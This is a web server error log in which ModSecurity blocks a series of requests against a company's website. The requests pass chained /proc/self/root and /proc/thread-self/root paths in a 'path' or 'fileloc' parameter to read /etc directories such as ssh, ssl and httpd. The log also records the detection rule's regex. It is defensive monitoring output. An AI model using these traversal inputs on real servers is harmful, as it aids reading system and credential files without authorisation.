[Wed Mar 18 06:43:12.811913 2026] [:error] [pid 19507:tid 140411574073088] [client 74.7.243.128:41180] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpzsNY0UrI5A3LftIxt8AAAAZQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 06:43:14.081531 2026] [:error] [pid 19507:tid 140411565680384] [client 74.7.243.128:41190] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpzstY0UrI5A3LftIxt8wAAAZU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 06:43:15.441598 2026] [:error] [pid 19507:tid 140411641214720] [client 74.7.243.128:41196] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpzs9Y0UrI5A3LftIxt9QAAAYw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 06:43:16.758138 2026] [:error] [pid 17653:tid 140411607643904] [client 74.7.243.128:41204] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpztMdf6f5d65gmYZSnRQAAAtA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 06:43:18.439790 2026] [:error] [pid 19507:tid 140411708356352] [client 74.7.243.128:41208] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpzttY0UrI5A3LftIxt9gAAAYQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 06:43:19.764767 2026] [:error] [pid 15051:tid 140411741927168] [client 74.7.243.128:43282] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpztymAPhZkrhU8w4lC3wAAAIA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 06:43:46.504367 2026] [:error] [pid 17653:tid 140411624429312] [client 74.7.241.31:35002] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpz0sdf6f5d65gmYZSneQAAAs4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 06:44:27.884523 2026] [:error] [pid 17653:tid 140411741927168] [client 74.7.243.128:43298] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpz-8df6f5d65gmYZSnowAAAsA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 06:44:29.196392 2026] [:error] [pid 17653:tid 140411641214720] [client 74.7.243.128:35826] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpz_cdf6f5d65gmYZSnpAAAAsw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 06:44:31.087819 2026] [:error] [pid 15051:tid 140411658000128] [client 74.7.243.128:35416] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpz_imAPhZkrhU8w4lC6QAAAIo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 06:44:59.559875 2026] [:error] [pid 11816:tid 140411599251200] [client 74.7.243.128:35428] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp0G-w_le52K8_3pV21iAAAAhE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 06:45:00.932063 2026] [:error] [pid 17887:tid 140411733534464] [client 74.7.243.128:37716] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/sysctl.conf.rpmnew"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp0HAkwaGbbGflqUZDlwwAAAME"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 06:45:03.296241 2026] [:error] [pid 15826:tid 140411632822016] [client 74.7.243.128:37732] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp0H-oXxyEfFpUF8f9B6AAAAU0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 06:45:05.257829 2026] [:error] [pid 31803:tid 140411632822016] [client 74.7.243.128:37742] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp0IeyqAr6etmhZHNqQqAAAAE0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 06:45:06.940416 2026] [:error] [pid 15051:tid 140411674785536] [client 74.7.243.128:37752] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp0IimAPhZkrhU8w4lC8QAAAIg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 06:45:08.607773 2026] [:error] [pid 29882:tid 140411590858496] [client 74.7.243.128:37768] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp0JEzinOy1jxa1j4fn9gAAARI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 06:45:11.004021 2026] [:error] [pid 17887:tid 140411574073088] [client 74.7.243.128:54374] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp0JwkwaGbbGflqUZDlygAAANQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 06:45:13.448988 2026] [:error] [pid 17653:tid 140411699963648] [client 74.7.243.128:54388] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp0Kcdf6f5d65gmYZSnuQAAAsU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 06:45:14.727148 2026] [:error] [pid 11816:tid 140411582465792] [client 74.7.243.128:54396] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp0Kuw_le52K8_3pV21iwAAAhM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 06:45:16.120103 2026] [:error] [pid 15826:tid 140411540502272] [client 74.7.243.128:54412] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp0LOoXxyEfFpUF8f9B7AAAAVg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 06:45:17.503048 2026] [:error] [pid 19507:tid 140411540502272] [client 74.7.243.128:54424] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp0LdY0UrI5A3LftIxuaQAAAZg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 06:45:19.048934 2026] [:error] [pid 11816:tid 140411725141760] [client 74.7.243.128:54436] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp0Luw_le52K8_3pV21jwAAAgI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 06:45:20.364528 2026] [:error] [pid 15826:tid 140411557287680] [client 74.7.243.128:57780] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp0MOoXxyEfFpUF8f9B7QAAAVY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
